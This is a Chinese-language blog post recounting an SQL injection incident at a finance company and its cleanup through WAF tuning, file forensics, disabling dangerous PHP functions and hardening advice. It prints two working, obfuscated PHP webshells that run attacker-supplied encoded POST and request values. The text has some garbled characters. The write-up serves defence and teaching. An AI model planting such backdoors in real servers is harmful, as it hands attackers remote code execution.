引言
一波未平,一波又起��。金融公司的業(yè)務(wù)實(shí)在是太引人耳目��,何況我們公司的業(yè)處正處于風(fēng)口之上(區(qū)塊鏈金融),并且每天有大量現(xiàn)金交易����,所以不知道有多少躲在暗處一直在盯著你的系統(tǒng),讓你防不勝防�,并且想方設(shè)法的找到突破點(diǎn),以達(dá)到的目的來獲取非法利益��。
俗話說:“道高一尺�����,魔高一丈”���。系統(tǒng)和代碼也可以這么理解��,防的在好�����,總有漏洞���。系統(tǒng)和代碼也沒有絕對的安全。該來的總會來......
sql注入與“她”相遇
某一天�,天氣晴朗��,心情舒暢�。“她”來了�,打破了筆者的美好時(shí)光�����。下午2點(diǎn)多鐘�����,筆者和朋友在蘇州街的天使匯二樓極客咖啡參加某個(gè)云廠商的Kubernetes一場技術(shù)沙龍����,正聽得興致勃勃的時(shí)候,筆者的公司群里有個(gè)php開發(fā)突然帖出一張圖:
這個(gè)時(shí)候��,群里翻騰了�����。沒錯(cuò)����,被SQL注入了�����,數(shù)據(jù)庫的表被注入了字段�,并且經(jīng)檢查后��,發(fā)現(xiàn)這個(gè)庫中的大部分表都被注入了這個(gè)字段���。我的電腦沒帶在身邊�����,真是著急����,馬上跟總監(jiān)說明問題嚴(yán)重性����。由于我電腦不在身邊, 只能把數(shù)據(jù)庫賬號授權(quán)(讀寫權(quán)限)給那個(gè)php開發(fā)��,讓他檢查所有的表���,把被注入的字段刪除掉����。并查看數(shù)據(jù)和其它表有沒有被修改。好在發(fā)現(xiàn)急時(shí)����,數(shù)據(jù)和業(yè)務(wù)都沒有被丟失和損壞。
這里我要說明一下�,我們的業(yè)務(wù)都在阿里云�,項(xiàng)目是以php為主,并且開通了waf防火墻���,只是waf上的防護(hù)措施比較寬松���。筆者在安全方面的經(jīng)驗(yàn)也比較欠缺,好在開通了阿里云的WAF�,讓筆者在排查和防護(hù)上也變得輕松和快捷。
此時(shí)���,我已經(jīng)在回家的路上���,回到家中迅速打開電腦。
調(diào)整waf策略
由于筆者也是剛接手工作���,阿里云上的很多策略還沒得到及時(shí)調(diào)整���。所以才這么容易被攻進(jìn)來���。即然被注入了,肯定要把源給揪出來�����。我也在次把所有的表都檢查一遍��,確認(rèn)沒問題后��,在去調(diào)整waf策略��,進(jìn)入阿里云����。
1、進(jìn)入相關(guān)域名的防護(hù)配置����,我們先來看下調(diào)整前的策略,如下圖:
從上圖可以看出,“Web應(yīng)用防護(hù)”策略是寬松模式�,其主要作用就是防護(hù)SQL注入、XSS跨站等常見Web應(yīng)用��,寬松模式下對業(yè)務(wù)的誤報(bào)程度最低����,但也容易漏過***。“惡意IP懲罰”也沒啟用����。這么寬松的防護(hù)措施風(fēng)險(xiǎn)比較大。趕緊先調(diào)整吧����。
2��、調(diào)整后的策略(如有多個(gè)域名��,都調(diào)整過來)�����,如下圖:
防護(hù)策略調(diào)整過了�,還需要把問題根源找到啊,這才是最重要的!?����?!
查找可疑文件
此時(shí),php的項(xiàng)目源碼分布在好幾臺服務(wù)器上���,如果靠傳統(tǒng)方式去排查���,挨個(gè)檢查這些服務(wù)器的目錄,各種能用的命令都用上了����,是不是也挺費(fèi)勁費(fèi)時(shí)的,還不知道要查到啥時(shí)候��。這個(gè)時(shí)候���,阿里有項(xiàng)服務(wù)起到關(guān)鍵的作用了:“態(tài)勢感知”��,這個(gè)需要升級為企業(yè)版本(費(fèi)用不高����,我們公司開通了一年,費(fèi)用6000多塊)��。這就是用阿里的好處(不是打廣告)�����,確實(shí)讓你省心���。
1�����、進(jìn)入“態(tài)勢感知”查看一下����,就立馬發(fā)現(xiàn)了一堆異常行為��,遍布在好幾臺服務(wù)器上如下圖:
2����、點(diǎn)幾個(gè)異常行為進(jìn)入看看����,我就打開其中兩個(gè)行為看一下,其它的行為也都差不多,如下圖:
從命令行參數(shù)中可以看出相關(guān)目錄有/Mode/Lite/ ���,并且給出的解決方案是及時(shí)排查可疑目錄下的信息并及時(shí)清除��。筆者順著給出的提示在服務(wù)器上進(jìn)行 find 相關(guān)目錄����,查找出目錄所在路徑�,如下圖:
順藤摸瓜吧,列一下這個(gè)目錄的文件:
從上圖發(fā)現(xiàn)了有兩個(gè)異常的php文件�,目錄屬主也和其它文件不一樣,筆者打開代碼倉庫也進(jìn)入相同的目錄進(jìn)行比對�����,代碼倉庫中確實(shí)沒有這兩個(gè)文件����。為了確認(rèn)清楚,把這兩個(gè)文件down下來發(fā)給開發(fā)�。開發(fā)說項(xiàng)目中沒有這兩個(gè)文件。把它down下來打開文件看看:
Content.class.php文件內(nèi)容:
<?php @($_=base64_decode($_POST[1])).$_(hex2bin($_POST[2]))?>}
這代碼不就是被注入的表里的字段嗎����,上面這段代碼大概意思為:把post請求的兩個(gè)參數(shù)�����,一個(gè)用base64解密��,一個(gè)用hex2bin轉(zhuǎn)成16進(jìn)制��,然后拼接在一起���,應(yīng)該是把操作數(shù)據(jù)庫的語句加密傳過來,然后解密����,這樣就不會被攔截掉。如果哪位博友認(rèn)為解釋的有誤����,一定要提出來。
Lite.class.php文件內(nèi)容:
<?php if(isset($_REQUEST['error'])&&isset($_REQUEST['limit'])){ $page = $_REQUEST['error']; $limit = $_REQUEST['limit']; $func = base64_decode(str_rot13(strrev($limit))); $func(base64_decode(str_rot13(strrev($page)))); exit; 上面的代碼其實(shí)和之前的那段代碼有共性�����,反轉(zhuǎn)字符串然后ROT13 編碼���,然后base64解碼�,最后按照 PHP 代碼來計(jì)算��,至于base64_decode�,str_rot13,strrev是為了繞過WAF等安全設(shè)備的過濾���。
已經(jīng)很明顯了����,就是由上面這些代碼文件Content.class.php等文件給注入的����。不用想了:rm -rf 吧。這個(gè)動態(tài)感知還是挺好用的���,能快速定位到風(fēng)險(xiǎn)目錄��,讓你減少排查的時(shí)間和精力���。
為了保險(xiǎn)起見,繼續(xù)排查一下其它的目錄是否也存在可疑文件��,一定要排查干凈了�,操作一定要小心��,也別誤刪��,果然在同級目錄下又發(fā)現(xiàn)一個(gè)���,如下圖:
還有一個(gè),如下圖:
和代碼倉庫����、開發(fā)的對比,可以確定這兩個(gè)也是***傳進(jìn)來的可疑文件�����,我有一個(gè)習(xí)慣�����,刪除文件之前喜歡備份到本地�。備份好這些可疑文件到本地之,都徹底清除掉�。
雖然都清除掉了,waf防火墻也調(diào)整了��,但是也沒有絕對的安全,還需要把php這些危險(xiǎn)的函數(shù)禁用掉���,比如禁用phpinfo、exec()�����、system()等:
phpinfo()功能描述:輸出 PHP 環(huán)境信息以及相關(guān)的模塊���、WEB 環(huán)境等信息���。危險(xiǎn)等級:中passthru()功能描述:允許執(zhí)行一個(gè)外部程序并回顯輸出,類似于 exec()�����。危險(xiǎn)等級:高exec()功能描述:允許執(zhí)行一個(gè)外部程序(如 UNIX Shell 或 CMD 命令等)��。危險(xiǎn)等級:高system()功能描述:允許執(zhí)行一個(gè)外部程序并回顯輸出�,類似于 passthru()。危險(xiǎn)等級:高chroot()功能描述:可改變當(dāng)前 PHP 進(jìn)程的工作根目錄���,僅當(dāng)系統(tǒng)支持 CLI 模式PHP 時(shí)才能工作��,且該函數(shù)不適用于 Windows 系統(tǒng)�。危險(xiǎn)等級:高scandir()功能描述:列出指定路徑中的文件和目錄。危險(xiǎn)等級:中chgrp()功能描述:改變文件或目錄所屬的用戶組�。危險(xiǎn)等級:高chown()功能描述:改變文件或目錄的所有者。危險(xiǎn)等級:高shell_exec()功能描述:通過 Shell 執(zhí)行命令��,并將執(zhí)行結(jié)果作為字符串返回����。危險(xiǎn)等級:高proc_open()功能描述:執(zhí)行一個(gè)命令并打開文件指針用于讀取以及寫入。危險(xiǎn)等級:高proc_get_status()功能描述:獲取使用 proc_open() 所打開進(jìn)程的信息�。危險(xiǎn)等級:高ini_alter()功能描述:是 ini_set() 函數(shù)的一個(gè)別名函數(shù),功能與 ini_set() 相同��。具體參見 ini_set()�。危險(xiǎn)等級:高ini_set()功能描述:可用于修改、設(shè)置 PHP 環(huán)境配置參數(shù)�。危險(xiǎn)等級:高ini_restore()功能描述:可用于恢復(fù) PHP 環(huán)境配置參數(shù)到其初始值。危險(xiǎn)等級:高dl()功能描述:在 PHP 進(jìn)行運(yùn)行過程當(dāng)中(而非啟動時(shí))加載一個(gè) PHP 外部模塊�。危險(xiǎn)等級:高pfsockopen()功能描述:建立一個(gè) Internet 或 UNIX 域的 socket 持久連接。危險(xiǎn)等級:高symlink()功能描述:在 UNIX 系統(tǒng)中建立一個(gè)符號鏈接�����。危險(xiǎn)等級:高popen()功能描述:可通過 popen() 的參數(shù)傳遞一條命令����,并對 popen() 所打開的文件進(jìn)行執(zhí)行�����。危險(xiǎn)等級:高putenv()功能描述:用于在 PHP 運(yùn)行時(shí)改變系統(tǒng)字符集環(huán)境。在低于 5.2.6 版本的 PHP 中���,可利用該函數(shù)修改系統(tǒng)字符集環(huán)境后����,利用 sendmail 指令發(fā)送特殊參數(shù)執(zhí)行系統(tǒng) SHELL 命令�。危險(xiǎn)等級:高禁用方法如下:打開/etc/php.ini文件,查找到 disable_functions �,添加需禁用的函數(shù)名,如下:phpinfo,eval,passthru,exec,system,chroot,scandir,chgrp,chown,shell_exec,proc_open,proc_get_status,ini_alter,ini_alter,ini_restore,dl,pfsockopen,openlog,syslog,readlink,symlink,popepassthru,stream_socket_server,fsocket,fsockopen
趁著這次事件��,把其它服務(wù)器也一并排查一下吧����,需要點(diǎn)耐心慢慢排查,***把這些可疑文件偽裝的非常好����,繞過了waf墻,人的肉眼不仔細(xì)看它都看不出來,所以還是要自己細(xì)心一點(diǎn)干活����。
需要聲明一下:每個(gè)人的做事方式都不一樣,本文只是把筆者遇到的事件分享給大家�����,僅作為交流和學(xué)習(xí)�。
名詞解釋
sql注入:
所謂SQL注入,就是通過把SQL命令插入到Web表單提交或輸入域名或頁面請求的查詢字符串����,最終達(dá)到欺騙服務(wù)器執(zhí)行惡意的SQL命令。具體來說��,它是利用現(xiàn)有應(yīng)用程序���,將(惡意的)SQL命令注入到后臺數(shù)據(jù)庫引擎執(zhí)行的能力�,它可以通過在Web表單中輸入(惡意)SQL語句得到一個(gè)存在安全漏洞的網(wǎng)站上的數(shù)據(jù)庫�,而不是按照設(shè)計(jì)者意圖去執(zhí)行SQL語句。 比如先前的很多影視網(wǎng)站泄露VIP會員密碼大多就是通過WEB表單遞交查詢字符暴出的�,這類表單特別容易受到SQL注入式***.
webshell:
webshell就是以asp、php��、jsp或者cgi等網(wǎng)頁文件形式存在的一種命令執(zhí)行環(huán)境,也可以將其稱做為一種網(wǎng)頁后門��。在了一個(gè)網(wǎng)站后��,通常會將asp或php后門文件與網(wǎng)站服務(wù)器WEB目錄下正常的網(wǎng)頁文件混在一起����,然后就可以使用瀏覽器來訪問asp或者php后門,得到一個(gè)命令執(zhí)行環(huán)境��,以達(dá)到控制網(wǎng)站服務(wù)器的目的���。
顧名思義,“web”的含義是顯然需要服務(wù)器開放web服務(wù)���,“shell”的含義是取得對服務(wù)器某種程度上操作權(quán)限�。webshell常常被稱為***者通過網(wǎng)站端口對網(wǎng)站服務(wù)器的某種程度上操作的權(quán)限��。由于webshell其大多是以動態(tài)腳本的形式出現(xiàn)����,也有人稱之為網(wǎng)站的后門工具。
安全防范小結(jié)
歸納一下�,主要有以下幾點(diǎn):
1.永遠(yuǎn)不要信任用戶的輸入��。對用戶的輸入進(jìn)行校驗(yàn)�����,可以通過正則表達(dá)式�,或限制長度��;對單引號和雙"-"進(jìn)行轉(zhuǎn)換等���。
2.永遠(yuǎn)不要使用動態(tài)拼裝sql�����,可以使用參數(shù)化的sql或者直接使用存儲過程進(jìn)行數(shù)據(jù)查詢存取��。
3.永遠(yuǎn)不要使用管理員權(quán)限的數(shù)據(jù)庫連接�,為每個(gè)應(yīng)用使用單獨(dú)的權(quán)限有限的數(shù)據(jù)庫連接�����。
4.不要把機(jī)密信息直接存放��,加密或者h(yuǎn)ash掉密碼和敏感的信息����。
5.應(yīng)用的異常信息應(yīng)該給出盡可能少的提示���,最好使用自定義的錯(cuò)誤信息對原始錯(cuò)誤信息進(jìn)行包裝。
6.sql注入的檢測方法一般采取輔助軟件或網(wǎng)站平臺來檢測����,軟件一般采用sql注入檢測工具jsky,網(wǎng)站平臺就有億思網(wǎng)站安全平臺檢測工具�����。MDCSOFT SCAN等���。采用MDCSOFT-IPS可以有效的防御SQL注入,XSS***等�����。
以上就是本文的全部內(nèi)容�,希望對大家的學(xué)習(xí)有所幫助,也希望大家多多支持VeVb武林網(wǎng)���。
注:相關(guān)教程知識閱讀請移步到MSSQL教程頻道����。
